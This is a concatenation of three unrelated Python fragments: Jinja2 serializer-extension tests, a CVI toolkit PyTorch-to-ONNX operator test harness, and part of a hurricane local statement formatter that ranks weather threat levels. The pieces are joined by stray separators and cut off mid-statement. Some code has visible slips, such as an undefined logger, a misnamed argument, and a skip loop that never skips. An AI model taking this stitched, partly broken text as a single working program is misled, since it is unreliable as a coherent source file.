with self.assertRaises((TypeError, exceptions.TemplateRuntimeError)):
env.from_string(
"{% set document = document|load_yaml %}" "{{ document.foo }}"
).render(document={"foo": "it works"})
def test_load_tag(self):
env = Environment(extensions=[SerializerExtension])
source = (
"{{ bar }}, "
+ "{% load_yaml as docu %}{foo: it works, {{ bar }}: baz}{% endload %}"
+ "{{ docu.foo }}"
)
rendered = env.from_string(source).render(bar="barred")
self.assertEqual(rendered, "barred, it works")
source = (
'{{ bar }}, {% load_json as docu %}{"foo": "it works", "{{ bar }}": "baz"}{% endload %}'
+ "{{ docu.foo }}"
)
rendered = env.from_string(source).render(bar="barred")
self.assertEqual(rendered, "barred, it works")
with self.assertRaises(exceptions.TemplateSyntaxError):
env.from_string(
"{% load_yamle as document %}{foo, bar: it works}{% endload %}"
).render()
with self.assertRaises(exceptions.TemplateRuntimeError):
env.from_string(
"{% load_json as document %}{foo, bar: it works}{% endload %}"
).render()
def test_load_json(self):
env = Environment(extensions=[SerializerExtension])
rendered = env.from_string(
'{% set document = \'{"foo": "it works"}\'|load_json %}'
"{{ document.foo }}"
).render()
self.assertEqual(rendered, "it works")
rendered = env.from_string(
"{% set document = document|load_json %}" "{{ document.foo }}"
).render(document='{"foo": "it works"}')
self.assertEqual(rendered, "it works")
# bad quotes
with self.assertRaises(exceptions.TemplateRuntimeError):
env.from_string("{{ document|load_json }}").render(
document="{'foo': 'it works'}"
)
# not a string
with self.assertRaises(exceptions.TemplateRuntimeError):
env.from_string("{{ document|load_json }}").render(
document={"foo": "it works"}
)
def test_load_yaml_template(self):
loader = DictLoader({"foo": '{bar: "my god is blue", foo: [1, 2, 3]}'})
env = Environment(extensions=[SerializerExtension], loader=loader)
rendered = env.from_string(
'{% import_yaml "foo" as doc %}{{ doc.bar }}'
).render()
self.assertEqual(rendered, "my god is blue")
with self.assertRaises(exceptions.TemplateNotFound):
env.from_string('{% import_yaml "does not exists" as doc %}').render()
def test_load_json_template(self):
loader = DictLoader({"foo": '{"bar": "my god is blue", "foo": [1, 2, 3]}'})
env = Environment(extensions=[SerializerExtension], loader=loader)
rendered = env.from_string(
'{% import_json "foo" as doc %}{{ doc.bar }}'
).render()
self.assertEqual(rendered, "my god is blue")
with self.assertRaises(exceptions.TemplateNotFound):
env.from_string('{% import_json "does not exists" as doc %}').render()
def test_load_text_template(self):
loader = DictLoader({"foo": "Foo!"})
env = Environment(extensions=[SerializerExtension], loader=loader)
rendered = env.from_string('{% import_text "foo" as doc %}{{ doc }}').render()
self.assertEqual(rendered, "Foo!")
with self.assertRaises(exceptions.TemplateNotFound):
env.from_string('{% import_text "does not exists" as doc %}').render()
def test_catalog(self):
loader = DictLoader(
{
"doc1": '{bar: "my god is blue"}',
"doc2": '{% import_yaml "doc1" as local2 %} never exported',
"doc3": '{% load_yaml as local3 %}{"foo": "it works"}{% endload %} me neither',
"main1": '{% from "doc2" import local2 %}{{ local2.bar }}',
"main2": '{% from "doc3" import local3 %}{{ local3.foo }}',
"main3": """
{% import "doc2" as imported2 %}
{% import "doc3" as imported3 %}
{{ imported2.local2.bar }}
""",
"main4": """
{% import "doc2" as imported2 %}
{% import "doc3" as imported3 %}
{{ imported3.local3.foo }}
| |
<gh_stars>1-10
#!/usr/bin/python3
# -*- coding: utf-8 -*-
from cvi_toolkit.model.mlir_model import MLIRModel
from cvi_toolkit.utils.mlir_shell import mlir_quant, \
mlir_opt, mlir_to_cvimodel, run_cvimodel
from cvi_toolkit.numpy_helper import npz_compare
from cvi_toolkit.transform.onnx_converter import OnnxConverter
from cvi_toolkit.numpy_helper.npz_compare import fp32_to_bf16
import onnx
from onnx import helper
from onnx import TensorProto
import onnxruntime
import pyruntime
import torch
import torch.nn as nn
import torchvision.models as models
import torch.nn.functional as F
from torch.distributions import Normal
import numpy as np
import os
import sys
import gc
import re
TEST_TORCH_IR = [
"Activation",
"AvgPool",
"AdaptiveAvgPool2d", # input_size % output_size == 0
# "Bilinear", ## Bilinear not support
"Batch_Norm", ##Batch_norm_2d and Instance_Norm_2d easily will fail
"Conv3d", # sunpport Conv with 3d, 2d, 1d case
"ConvTranspose",
"Cat_Chunk",
"Clip",
"ConstantPad",
# "ChannelShuffle", ## ChannelShuffle not support
# "Dropout", ## Dropout not support
"Expand",
"Flatten", ## Unflatten not support
"GRU",
"Identity",
"Log",
"LSTM",
"LayerNorm",
"Linear",
"LogSigmoid", #some times fail
"LogSoftmax",
# "Mulit_attention_api", ## now not support
"MaxPool", ## Maxpool_1d and Max_Un_Pool2d not support
"MaxPool3d",
"Max_Min",
"Math", ## sum, prod not support
"masked_fill",
"Norm",
"MulSubConstant5d",
"Multi_input",
"Pow",
"Repeat", ## repeat_interleave nonx not support
"ReflectionPad", ## ReflectionPad_2d not support
"Std",
"Squeeze",
"Size",
"Sum",
"Scale",
"SiLU",
# "Unfold", ##Unfold not support
"Upsample",
"ZeroPad2d",
]
NOT_SUPPORT_CMDBUF_TEST_IR = [""]
NOT_SUPPORT_BF16_TEST_IR = [""]
NOT_SUPPORT_INT8_TEST_IR = ["masked_fill"] # just for save test time
def cvimodel_inference(inputs, model_name):
model = pyruntime.Model(model_name)
for i in model.inputs:
name = i.name
data = inputs[name]
if name.endswith('_quant_i8'):
data = data.astype(np.int8)
elif name.endswith('_quant_u16'):
data= data.astype(np.uint16)
elif name.endswith('_quant_i16'):
data = data.astype(np.int16)
elif name.endswith('_quant_bf16'):
data = fp32_to_bf16(data)
i.data[:] = data.reshape(i.data.shape)
model.forward()
outputs = {}
for output in model.outputs:
outputs[output.name] = np.array(output.data)
return outputs
def get_chip_name():
runchip = os.environ.get('SET_CHIP_NAME', None)
if not runchip:
log.warning(
"no found SET_CHIP_NAME environment value, set 183x as default")
return "cv183x"
return runchip
def make_test_calibration_table(tensors, table_name):
# simple calibration table
with open(table_name, 'w') as f:
for name in tensors:
t = 1.1 * max(np.abs(tensors[name].flatten())) + 0.01
f.write("{} {}\n".format(name, t))
def _fill_inputs(ort_session, inputs):
inodes = ort_session.get_inputs()
if len(inodes) == 1:
dtype = np.int64 if inodes[0].type == 'tensor(int64)' \
else np.float32
return {inodes[0].name: inputs.astype(dtype)}
# inputs is map
assert(len(inodes) == len(inputs))
data = {}
for i in range(len(inodes)):
name = inodes[i].name
dtype = np.int64 if inodes[i].type == 'tensor(int64)' \
else np.float32
data[name] = inputs[name].astype(dtype)
return data
def _onnx_inference(inputs, model_name, input_name="input", input_cb=None):
ort_session = onnxruntime.InferenceSession(model_name)
if callable(input_cb):
ort_inputs = input_cb(model_name, "onnx", input)
else:
ort_inputs = _fill_inputs(ort_session, inputs)
outs = ort_session.run(None, ort_inputs)
ort_outputs = ort_session.get_outputs()
outputs = {}
idx = 0
for output in ort_outputs:
outputs[output.name] = outs[idx]
idx = idx + 1
return outputs
def onnx_inference(input, model_def, input_cb = None):
return _onnx_inference(input, model_def, input_cb=input_cb)
class TORCH_IR_TESTER(object):
def __init__(self):
self.converter = None
self.cvi_model_test = True
self.test_function = {
"Activation": self.test_Activation,
"AvgPool": self.test_AvgPool,
"AdaptiveAvgPool2d": self.test_AdaptiveAvgPool2d,
"Batch_Norm": self.test_Batch_Norm,
"Bilinear": self.test_Bilinear,
"Conv3d": self.test_Conv3d,
"ConvTranspose": self.test_ConvTranspose,
"Cat_Chunk": self.test_Cat_Chunk,
"Clip": self.test_Clip,
"ConstantPad": self.test_ConstantPad,
"ChannelShuffle": self.test_ChannelShuffle,
"Dropout": self.test_Dropout,
"Expand": self.test_Expand,
"Flatten": self.test_Flatten,
"GRU": self.test_GRU,
"Identity": self.test_Identity,
"Log": self.test_Log,
"LogSigmoid": self.test_LogSigmoid,
"LogSoftmax": self.test_LogSoftmax,
"LayerNorm": self.test_LayerNorm,
"Linear": self.test_Linear,
"LSTM": self.test_LSTM,
"MaxPool": self.test_MaxPool,
"MaxPool3d": self.test_MaxPool3d,
"Math": self.test_Math,
"masked_fill": self.test_masked_fill,
"Mulit_attention_api": self.test_Mulit_attention_api,
"MulSubConstant5d": self.test_MulSubConstant5d,
"Multi_input": self.test_Multi_input,
"Max_Min": self.test_Max_Min,
"Norm": self.test_Norm,
"Pow": self.test_Pow,
"Repeat": self.test_Repeat,
"ReflectionPad": self.test_ReflectionPad,
"Std": self.test_Std,
"Scale": self.test_Scale,
"Squeeze": self.test_Squeeze,
"Size": self.test_Size,
"SiLU": self.test_SiLU,
"Sum": self.test_Sum,
"Unfold": self.test_Unfold,
"Upsample": self.test_Upsample,
"ZeroPad2d": self.test_ZeroPad2d,
}
self.set_quant_mode()
def set_quant_mode(self, mode="int8"):
if mode == "int8":
self.quant_mode = "int8"
elif mode == "bf16":
self.quant_mode = "bf16"
else:
raise RuntimeError("Not support quant mode {}".format(mode))
def onnx_convert_and_infernece(self, inputs, model_name, torch_output):
fp32_mlir = "{}.mlir".format(model_name)
model_def = model_name + '.onnx'
converter = OnnxConverter(model_name, model_def, fp32_mlir, batch_size=0)
converter.run()
del converter
gc.collect()
input_npz = "{}_in_fp32.npz".format(model_name)
if isinstance(inputs, tuple):
input_data = {}
for i in range(len(inputs)):
key = "in_{}".format(i)
input_data[key] = inputs[i].data.numpy().astype(np.float32)
np.savez(input_npz, **input_data)
else:
input_data = inputs.data.numpy().astype(np.float32)
np.savez(input_npz, input=input_data)
onnx_outs = onnx_inference(input_data, model_def)
num_outputs = len(onnx_outs)
##test pytorch out_data between onnx out_data
if num_outputs == 1:
onnx_out = list(onnx_outs.values())[0]
np.testing.assert_allclose(torch_output.flatten(), onnx_out.flatten(), rtol=1e-5, atol=1e-01)
else:
assert(len(torch_output) == num_outputs)
keys = list(onnx_outs)
for i in range(num_outputs):
print("==> Torch vs Onnx, at[{}]".format(i))
np.testing.assert_allclose(torch_output[i].data.numpy().flatten(), onnx_outs[keys[i]].flatten(), rtol=1e-5, atol=1e-01)
fp32_opt_mlir = "{}_opt.mlir".format(model_name)
fp32_csv = "{}_fp32.csv".format(model_name)
mlir_opt(fp32_mlir, fp32_opt_mlir, fp32_csv)
self.mlir_model = None
self.mlir_model = MLIRModel()
self.mlir_model.load_model(fp32_opt_mlir)
mlir_outs = self.mlir_model.inference(input_data)
fp32_tensors = self.mlir_model.get_all_tensor()
assert(len(mlir_outs) == num_outputs)
if num_outputs > 1:
patten = re.compile(r"_[A-Z]\w+?$")
for name in mlir_outs:
onnx_name = patten.sub("", name)
print("Compare mlir[{}] : onnx[{}]".format(name, onnx_name))
np.testing.assert_allclose(mlir_outs[name].flatten(), onnx_outs[onnx_name].flatten(), rtol=1e-5, atol=1e-01)
else:
if isinstance(mlir_outs, dict):
mlir_outs = list(mlir_outs.values())[0]
onnx_out = onnx_outs.popitem()[1]
np.testing.assert_allclose(mlir_outs.flatten(), onnx_out.flatten(), rtol=1e-5, atol=1e-01)
print("Compare Torch and Onnx success")
mlir_npz = "{}_fp32.npz".format(model_name)
np.savez(mlir_npz, **fp32_tensors)
tensors = self.mlir_model.get_all_tensor()
if self.quant_mode == "int8":
for i in NOT_SUPPORT_INT8_TEST_IR:
if i == model_name:
print("{} not support int8 test!".format(model_name))
table_name = "{}_cali_table".format(model_name)
# gen cali table
make_test_calibration_table(tensors, table_name)
# quant
quant_mlir = "{}_quant_int8.mlir".format(model_name)
int8_csv = "{}_int8.csv".format(model_name)
chip = get_chip_name()
ret = mlir_quant(fp32_opt_mlir, quant_mlir, chip,
int8_csv, calib_table=table_name, quantize="int8")
if ret < 0: raise RuntimeError("tpu_quant failed")
# get mlir output
del self.mlir_model
self.mlir_model = MLIRModel()
self.mlir_model.load_model(quant_mlir)
mlir_int8_outs = self.mlir_model.inference(input_data)
assert(len(mlir_int8_outs) == num_outputs)
int8_tensors = self.mlir_model.get_all_tensor()
ref_npz = "{}_all_tensor_int8_mlir.npz".format(model_name)
np.savez(ref_npz, **int8_tensors)
npz_compare([ref_npz, mlir_npz, "--tolerance",
"0.6,0.6,0.5", "--dequant", "--op_info", int8_csv])
# gen cvimodel
cvimodel = "{}_int8.cvimodel".format(model_name)
ret = mlir_to_cvimodel(quant_mlir, cvimodel, inputs_type="SAME", outputs_type="FP32")
if ret < 0: raise RuntimeError("gen_cvimodel failed")
# run cvi_model
output_tensor_npz = "{}_all_tensor_int8_cvi.npz".format(model_name)
cvi_outs = cvimodel_inference(int8_tensors, cvimodel)
assert(len(cvi_outs) == num_outputs)
for name in cvi_outs:
if name not in int8_tensors:
raise RuntimeError("cvimodel output name not correct")
np.savez(output_tensor_npz, **cvi_outs)
npz_compare([output_tensor_npz, ref_npz,
"--tolerance", "0.99,0.99,0.90"])
elif self.quant_mode == "bf16":
for i in NOT_SUPPORT_BF16_TEST_IR:
if i == model_name:
print("{} not support bf16 test!".format(model_name))
return
# opt
fp32_opt_mlir = "{}_opt_bf16.mlir".format(model_name)
fp32_csv = "{}_fp32.csv".format(model_name)
mlir_opt(fp32_mlir, fp32_opt_mlir, fp32_csv)
bf16_csv = "{}_bf16.csv".format(model_name)
# quant
quant_mlir = "{}_quant_bf16.mlir".format(model_name)
chip = get_chip_name()
ret = mlir_quant(fp32_opt_mlir, quant_mlir, chip,
bf16_csv, quantize="bf16")
if ret < 0: raise RuntimeError("tpu_quant failed")
# get mlir output
del self.mlir_model
self.mlir_model = MLIRModel()
self.mlir_model.load_model(quant_mlir)
mlir_bf16_outs = self.mlir_model.inference(input_data)
assert(len(mlir_bf16_outs) == num_outputs)
bf16_tensors = self.mlir_model.get_all_tensor()
ref_npz = "{}_all_tensor_bf16_mlir.npz".format(model_name)
np.savez(ref_npz, **bf16_tensors)
npz_compare([ref_npz, mlir_npz, "--tolerance",
"0.8,0.8,0.8", "--dequant", "--op_info", bf16_csv])
# gen cvimodel
cvimodel = "{}_bf16.cvimodel".format(model_name)
ret = mlir_to_cvimodel(quant_mlir, cvimodel, inputs_type="SAME", outputs_type="FP32")
if ret < 0: raise RuntimeError("gen_cvimodel failed")
# run cvi_model
output_tensor_npz = "{}_all_tensor_bf16_cvi.npz".format(model_name)
cvi_outs = cvimodel_inference(bf16_tensors, cvimodel)
assert(len(cvi_outs) == num_outputs)
for name in cvi_outs:
if name not in bf16_tensors:
raise RuntimeError("cvimodel output name not correct")
np.savez(output_tensor_npz, **cvi_outs)
npz_compare([output_tensor_npz, ref_npz, "--op_info", bf16_csv, "--tolerance", "0.9,0.9,0.90", "-vv"])
del self.mlir_model
def pytorch_transform_onnx(self, model, inputs, test_name):
in_names = []
if isinstance(inputs, tuple):
for i in range(len(inputs)):
in_names.append("in_{}".format(i))
else:
in_names = ["in_0"]
torch.onnx.export(model,
inputs,
test_name + ".onnx",
export_params=True,
opset_version=11,
verbose=True,
input_names=in_names)
def test_LSTM(self):
class Net(torch.nn.Module):
def __init__(self):
super(Net, self).__init__()
self.rnn = nn.LSTM(input_size=100, hidden_size=128, bidirectional=True)
def forward(self, x, h_0, c_0):
Y,(Y_h, Y_c) = self.rnn(x, (h_0, c_0))
return Y,Y_h,Y_c
test_name = 'LSTM'
input = torch.randn(81, 1, 100)
h_0 = torch.randn(2, 1, 128)
c_0 = torch.randn(2,1,128)
net = Net()
outputs = net(input, h_0, c_0)
# Use the exporter from torch to convert to onnx
inputs = (input, h_0, c_0)
self.pytorch_transform_onnx(net, inputs, test_name)
self.onnx_convert_and_infernece(inputs, test_name, outputs)
def test_Bilinear(self):
class Net(torch.nn.Module):
def __init__(self):
super(Net, self).__init__()
self.Bilinear = nn.Bilinear(20, 30, 40)
def forward(self, x, y):
## input_shape = (100, 20), (100, 30)
out = self.Bilinear(x, y) ## output_shape = (100, 40)
return out
input_data = {}
input_shape = [100, 20, 30]
input_data['input'] = torch.randn(input_shape[0], input_shape[1])
input_data['input1'] = torch.randn(input_shape[0], input_shape[2])
test_name = 'Bilinear'
net = Net()
torch_output_data = net(input_data['input'], input_data['input1'])
# Use the exporter from torch to convert to onnx
self.pytorch_transform_onnx(net, input_data, test_name)
self.onnx_convert_and_infernece(input_data, test_name, torch_output_data)
def test_Log(self):
class Net(torch.nn.Module):
def __init__(self):
super(Net, self).__init__()
def forward(self, x):
x = torch.log(x)
return x
input_shape = [1, 3, 100, 100]
test_name = 'Log'
net = Net()
input_data = torch.clamp(torch.randn(*input_shape), 8.0, 10.0)
torch_output_data = net(input_data)
# Use the exporter from torch to convert to onnx
self.pytorch_transform_onnx(net, input_data, test_name)
torch_output_data = torch_output_data.data.numpy()
self.onnx_convert_and_infernece(input_data, test_name, torch_output_data)
def test_LogSigmoid(self):
class Net(torch.nn.Module):
def __init__(self):
super(Net, self).__init__()
self.linear = nn.Linear(100, 200, bias=False)
self.act = nn.LogSigmoid()
def forward(self, x):
x = self.linear(x)
x = self.act(x)
return x
input_shape = [3, 100, 100]
test_name = 'LogSigmoid'
net = Net()
input_data = torch.randn(input_shape)
torch_output_data = net(input_data)
# Use the exporter from torch to convert to onnx
self.pytorch_transform_onnx(net, input_data, test_name)
torch_output_data = torch_output_data.data.numpy()
self.onnx_convert_and_infernece(input_data, test_name, torch_output_data)
def test_LogSoftmax(self):
class Net(torch.nn.Module):
def __init__(self):
super(Net, self).__init__()
self.linear = nn.Linear(32, 72, bias=False)
self.act = nn.LogSoftmax(dim = 2)
def forward(self, x):
x = self.linear(x)
x | |
maxThreat):
import TCVDictionary
potentialImpactStatements = TCVDictionary.PotentialImpactStatements
statements = potentialImpactStatements[elementName][maxThreat]
return statements
def _impactCategoryToThreatLevel(self, impactCategory):
if impactCategory == "catastrophic" or impactCategory == "devastating":
return "Extreme"
elif impactCategory == "extensive":
return "High"
elif impactCategory == "significant":
return "Mod"
elif impactCategory == "limited":
return "Elevated"
else:
return "None"
def _determineHazardStates(self):
self._currentHazardsList = []
self._changesHazardsList = []
self.debug_print("*"*80)
keys = self._previousAdvisory.keys()
keys.sort()
for key in keys:
self.debug_print("%s : %s" % (key, self._previousAdvisory[key]), 1)
for hazard in self._previousAdvisory["HazardsForHLS"]:
self.debug_print("DEBUG Hazard: %s" % (self._pp.pformat(hazard)), 1)
if hazard['act'] != 'CON':
self._changesHazardsList.append(hazard)
if hazard['act'] not in ['CAN', "UPG"]:
self._currentHazardsList.append(hazard)
self.debug_print("-"*80, 1)
self.debug_print("self._changesHazardsList = %s" % (self._changesHazardsList), 1)
self.debug_print("self._currentHazardsList = %s" % (self._currentHazardsList), 1)
###############################################################
### Sampling and Statistics related methods
def _sampleHLSData(self, argDict):
editAreas = [(self._cwa(), self._cwa())]
cwaSampler = self.getSampler(argDict,
(self._analysisList_HLS(), self._timeRangeList3Hour, editAreas))
statList = self.getStatList(cwaSampler,
self._analysisList_HLS(),
self._timeRangeList3Hour,
self._cwa())
for period in range(len(statList)):
self.debug_print("=" * 100, 1)
self.debug_print("In _sampleHLSData for period %s (%s)" % \
(period, self._timeRangeList3Hour[period][0]), 1)
statDict = statList[period]
for threatName in ['WindThreat', 'FloodingRainThreat', 'TornadoThreat']:
self._sampleRankedDiscreteValue(threatName, statDict)
# TODO: Investigate if this sampling method is still really needed. The JSON files may
# have all the needed information now
self._sampleMostSignificantDiscreteValue(threatName, statDict)
qpfToFfgRatio = self._getStatValue(statDict, "QPFtoFFGRatio", "Max")
decidingField = self._samplingDict['FloodingRainThreat']['decidingField']
if decidingField is None or qpfToFfgRatio > decidingField:
self._samplingDict['FloodingRainThreat']['decidingField'] = qpfToFfgRatio
self.debug_print("WindThreat = %s" % (self._samplingDict['WindThreat']['inputThreatDominant']), 1)
self.debug_print("FloodingRainThreat = %s" % (self._samplingDict['FloodingRainThreat']['inputThreatDominant']), 1)
self.debug_print("TornadoThreat = %s" % (self._samplingDict['TornadoThreat']['inputThreatDominant']), 1)
self._createWholeDomainEditArea(argDict)
editAreas = [("WholeDomain", "WholeDomain")]
wholeDomainSampler = self.getSampler(argDict,
(self._analysisList_HLS_WholeDomain(), self._timeRangeList3Hour, editAreas))
statList = self.getStatList(wholeDomainSampler,
self._analysisList_HLS_WholeDomain(),
self._timeRangeList3Hour,
"WholeDomain")
for period in range(len(statList)):
statDict = statList[period]
maxWind = self._getStatValue(statDict, "Wind", "Max", self.VECTOR())
decidingField = self._samplingDict['WindThreat']['decidingField']
if decidingField is None or maxWind > decidingField:
self._samplingDict['WindThreat']['decidingField'] = maxWind
editAreas = [(self._cwa(), self._cwa())]
intersectAreas = self._computeIntersectAreas(editAreas, argDict)
if len(intersectAreas) != 0:
self.debug_print("Sampling StormSurgeThreat, now")
intersectSampler = self.getSampler(argDict,
(self._intersectAnalysisList_HLS(), self._timeRangeList3Hour, intersectAreas))
statList = self.getStatList(intersectSampler,
self._intersectAnalysisList_HLS(),
self._timeRangeList3Hour,
"intersect_" + self._cwa())
for period in range(len(statList)):
statDict = statList[period]
self.debug_print("current stormSurge statDict = %s" % (self._pp.pformat(statDict)), 1)
self._sampleRankedDiscreteValue('StormSurgeThreat', statDict)
inundationMax = self._getStatValue(statDict, "InundationMax", "Max")
decidingField = self._samplingDict['StormSurgeThreat']['decidingField']
if decidingField is None or inundationMax > decidingField:
self._samplingDict['StormSurgeThreat']['decidingField'] = inundationMax
self.debug_print("StormSurgeThreat = %s" % (self._samplingDict['StormSurgeThreat']['inputThreatDominant']), 1)
def _sampleTCVAdvisory(self, advisory):
self.debug_print("sampling TCV advisory!", 1)
seenValidThreatLevel = {}
for zone in advisory["ZoneData"]:
self.debug_print("-" * 60, 1)
self.debug_print("Looking at zone %s" % (zone), 1)
for key in advisory["ZoneData"][zone]:
if "Threat" not in key or "highestHunkerDown" in key:
continue
if key not in seenValidThreatLevel:
seenValidThreatLevel[key] = False
self.debug_print("Looking at key '%s'" % (key), 1)
threatLevel = advisory["ZoneData"][zone][key]
self.debug_print(" Threat level = %s" % (threatLevel), 1)
if (self._samplingDict[key]['inputThreatLow'] is None) and (not seenValidThreatLevel[key]):
self._samplingDict[key]['inputThreatLow'] = threatLevel
if (self._samplingDict[key]['inputThreatHigh'] is None) and (not seenValidThreatLevel[key]):
self._samplingDict[key]['inputThreatHigh'] = threatLevel
if threatLevel != None:
seenValidThreatLevel[key] = True
lowThreat = self._samplingDict[key]['inputThreatLow']
highThreat = self._samplingDict[key]['inputThreatHigh']
threatOrder = self.mostSignificantDiscrete_keyOrder_dict(None, None, None)[key]
self.debug_print("***** threatOrder = %s" % (repr(threatOrder)), 1)
if threatOrder.index(threatLevel) < threatOrder.index(lowThreat):
lowThreat = threatLevel
if threatOrder.index(threatLevel) > threatOrder.index(highThreat):
highThreat = threatLevel
if lowThreat is None:
self.debug_print(" low threat = Python None", 1)
else:
self.debug_print(" low threat = %s" % (lowThreat), 1)
self.debug_print(" high threat = %s" % (highThreat), 1)
self._samplingDict[key]['inputThreatLow'] = lowThreat
self._samplingDict[key]['inputThreatHigh'] = highThreat
self.debug_print("Sampling dict =\n\n%s\n" % (self._pp.pformat(self._samplingDict)), 1)
def _sampleRankedDiscreteValue(self, threatName, statDict):
self.debug_print("-" * 60, 1)
self.debug_print("_sampleRankedDiscreteValue statDict =\n\n%s\n" % (self._pp.pformat(statDict)), 1)
rankedThreatLevels = self.getStats(statDict, threatName + "__rankedDiscreteValue")
self.debug_print("sampling %s" % (threatName), 1)
self.debug_print("sampleData: rankedThreatLevels =\n\n%s\n" % (self._pp.pformat(rankedThreatLevels)), 1)
if rankedThreatLevels is not None:
dominantThreatLevel = self._getDominantThreatLevel(threatName, rankedThreatLevels)
self.debug_print("dominantThreatLevel = %s" % (dominantThreatLevel), 1)
currentDominantThreatLevel = self._samplingDict[threatName]['inputThreatDominant']
self.debug_print("currentDominantThreatLevel = %s" % (currentDominantThreatLevel), 1)
self._samplingDict[threatName]['inputThreatDominant'] = self._getHighestThreat(threatName,
dominantThreatLevel,
currentDominantThreatLevel)
self.debug_print("new dominant = %s" % (self._samplingDict[threatName]['inputThreatDominant']), 1)
def _sampleMostSignificantDiscreteValue(self, threatName, statDict):
self.debug_print("_sampleMostSignificantDiscreteValue for %s" % (threatName), 1)
threatLevel = self.getStats(statDict, threatName + "__mostSignificantDiscreteValue")
self.debug_print("threatLevel = %s" % (threatLevel), 1)
if threatLevel is not None:
inputThreatLow = self._samplingDict[threatName]['inputThreatLow']
self.debug_print("current inputThreatLow = %s" % (inputThreatLow), 1)
if inputThreatLow is None:
self._samplingDict[threatName]['inputThreatLow'] = threatLevel
else:
self._samplingDict[threatName]['inputThreatLow'] = self._getLowestThreat(threatName,
threatLevel,
inputThreatLow)
self.debug_print("new inputThreatLow = %s" % (self._samplingDict[threatName]['inputThreatLow']), 1)
inputThreatHigh = self._samplingDict[threatName]['inputThreatHigh']
self.debug_print("current inputThreatHigh = %s" % (inputThreatHigh), 1)
self._samplingDict[threatName]['inputThreatHigh'] = self._getHighestThreat(threatName,
threatLevel,
inputThreatHigh)
self.debug_print("new inputThreatHigh = %s" % (self._samplingDict[threatName]['inputThreatHigh']), 1)
def _getDominantThreatLevel(self, threatName, rankedThreatLevels):
dominantLevelWithHighestRank = None
highestRank = None
for (level, rank) in rankedThreatLevels:
if highestRank is None or rank > highestRank:
highestRank = rank
dominantLevelWithHighestRank = level
elif rank == highestRank:
dominantLevelWithHighestRank = self._getHighestThreat(threatName,
dominantLevelWithHighestRank,
level)
return dominantLevelWithHighestRank
def _getHighestThreat(self, threatName, threatLevel1, threatLevel2):
keyOrderDict = self.mostSignificantDiscrete_keyOrder_dict(None, None, None)
keyOrder = keyOrderDict[threatName]
level1Index = keyOrder.index(threatLevel1)
level2Index = keyOrder.index(threatLevel2)
if level1Index < level2Index:
return threatLevel2
elif level1Index == level2Index:
return threatLevel1
else:
return threatLevel1
def _getLowestThreat(self, threatName, threatLevel1, threatLevel2):
keyOrderDict = self.mostSignificantDiscrete_keyOrder_dict(None, None, None)
keyOrder = keyOrderDict[threatName]
level1Index = keyOrder.index(threatLevel1)
level2Index = keyOrder.index(threatLevel2)
if level1Index < level2Index:
return threatLevel1
elif level1Index == level2Index:
return threatLevel1
else:
return threatLevel2
def _setHazardImpactCategories(self, threatName):
inputThreatLow = self._samplingDict[threatName]['inputThreatLow']
inputThreatHigh = self._samplingDict[threatName]['inputThreatHigh']
inputThreatDominant = self._samplingDict[threatName]['inputThreatDominant']
decidingField = self._samplingDict[threatName]['decidingField']
catastrophicThreshold = self._samplingDict[threatName]['catastrophicThreshold']
self.debug_print("-" * 60, 1)
self.debug_print("DEBUG: _setHazardImpactCategories for %s" % (threatName), 1)
impactMin = None
impactMax = None
impactRange = None
impactRangeMax = None
# Determine lowest impact category
if inputThreatLow == "Extreme":
if threatName != "TornadoThreat" and decidingField >= catastrophicThreshold:
impactMin = "catastrophic"
else:
impactMin = "devastating"
elif inputThreatLow == "High":
impactMin = "extensive"
elif inputThreatLow == "Mod":
impactMin = "significant"
elif inputThreatLow == "Elevated":
impactMin = "limited"
else:
impactMin = "none"
# Determine highest impact category
if inputThreatHigh == "Extreme":
if threatName != "TornadoThreat" and decidingField >= catastrophicThreshold:
impactMax = "catastrophic"
impactRangeMax = "devastating"
else:
impactMax = "devastating"
impactRangeMax = "extensive"
elif inputThreatHigh == "High":
impactMax = "extensive"
impactRangeMax = "significant"
elif inputThreatHigh == "Mod":
impactMax = "significant"
impactRangeMax = "limited"
elif inputThreatHigh == "Elevated":
impactMax = "limited"
impactRangeMax = "none"
else:
impactMax = "none"
impactRangeMax = "none"
self.debug_print(
"DEBUG: impactMin = '%s' impactMax = '%s' impactRangeMax = '%s'" % \
(impactMin, impactMax, impactRangeMax), 1)
# Determine dominant impact category for rest of CWA - No impact
if impactMin == "none" and impactMax == "none":
impactRange = "Little to no " + self._frame("additional") + " impacts are anticipated at this time across " + self._cwa_descriptor() + "."
# Otherwise, at least some impact will be experienced across the CWA
else:
# Do not permit the lowest category to be "None", if the highest category is also not "None"
# This is to avoid poor impact range wording in situations of tight gradients across a CWA
# (e.g. "None to High")
if impactMin == "none" and impactMax != "none":
impactMin = "limited"
if impactMin == impactMax:
impactRange = impactMax
impactRangeMax = impactMax
elif impactMin == impactRangeMax:
impactRange = impactRangeMax
else:
impactRange = impactMin + " to " + impactRangeMax
self._samplingDict[threatName]['impactMin'] = impactMin
self._samplingDict[threatName]['impactMax'] = impactMax
self._samplingDict[threatName]['impactRange'] = impactRange
self._samplingDict[threatName]['impactRangeMax'] = impactRangeMax
###############################################################
### Area, Zone and Segment related methods
def _createWholeDomainEditArea(self, argDict):
editAreaUtils = EditAreaUtils.EditAreaUtils()
editAreaUtils.setUp(None, argDict)
gridLoc = editAreaUtils.getGridLoc()
grid2Dbit = JavaGrid2DBit( gridLoc.gridSize().x, gridLoc.gridSize().y )
grid2Dbit.setAllValues(1)
refID = ReferenceID("WholeDomain")
refData = ReferenceData(gridLoc, refID, grid2Dbit)
editAreaUtils.saveEditAreas([refData])
###############################################################
### Hazards related methods
def _determineHazards(self, segments):
# Return a list of hazards from the given segments in the form:
# (key, landList, marineList, coastalList, inlandList)
# where key is (hdln, act, phen, sig) and the lists show which areas
# contain the hazard separated by category
hazAreaList = []
for segment in segments:
hazardTable = self._argDict["hazards"]
hazards = hazardTable.getHazardList(segment)
for hazard in hazards:
action = hazard['act']
hazAreaList.append((hazard, segment))
# Consolidate hazards (there could be multiple segments with the same phen/sig/act)
hazardDict = {}
hazardList = []
for hazard, segment in hazAreaList:
key = (hazard['hdln'], hazard['act'], hazard['phen'], hazard['sig'])
if key not in hazardDict.keys():
hazardDict[key] = segment
hazardList.append(key)
else:
hazardDict[key] = hazardDict[key]+segment
self.debug_print("hazardList =\n\n%s\n" % (self._pp.pformat(hazardList)), 1)
return hazardList
###############################################################
### Time related methods
def _formatLocalTime(self, para, areas):
# Create a time string in local time
# e.g. 2 AM EDT
# Get the Z time hour
timeSearch = re.compile("...([0-9]+) *(Z|UTC)...")
timeStr = timeSearch.search(para)
